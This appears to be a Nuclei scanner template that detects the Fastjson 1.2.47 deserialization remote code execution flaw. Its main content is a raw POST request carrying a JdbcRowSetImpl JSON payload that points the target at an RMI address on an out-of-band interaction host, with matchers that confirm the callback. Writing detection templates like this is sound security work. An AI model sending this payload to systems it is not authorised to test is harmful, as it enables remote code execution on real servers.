nuclei-templates/http/vulnerabilities/fastjson/fastjson-1-2-47-rce.yaml

54 lines
1.5 KiB
YAML
Raw Permalink Normal View History

2021-10-30 11:17:35 +00:00
id: fastjson-1-2-47-rce
info:
name: Fastjson 1.2.47 - Remote Code Execution
author: zh
severity: critical
description: Fastjson 1.2.47 is susceptible to a deserialization remote code execution vulnerability.
reference:
- https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce
- https://www.freebuf.com/vuls/208339.html
- https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955
2021-10-12 05:57:50 +00:00
- https://github.com/wyzxxz/fastjson_rce_tool
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2023-10-14 11:27:55 +00:00
cvss-score: 10
cwe-id: CWE-77
metadata:
max-request: 1
2023-10-14 11:27:55 +00:00
tags: rce,deserialization,oast,vulhub,fastjson
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://{{interactsh-url}}/Exploit",
"autoCommit":true
}
}
matchers-condition: and
matchers:
- type: word
2023-10-14 11:27:55 +00:00
part: interactsh_protocol # Confirms DNS Interaction
words:
- "dns"
- type: word
condition: and
words:
- "Bad Request"
- "400"
# digest: 490a00463044022005538cf7bac884796d630fc75708b13aa1a7747d4a7a27eceaa7d3d8c754856402205bcfa20a1013922f70350384f100648317c6860bd62b35dc1fefce4c928a7c92:922c64590222798bb761d5b6d8e72950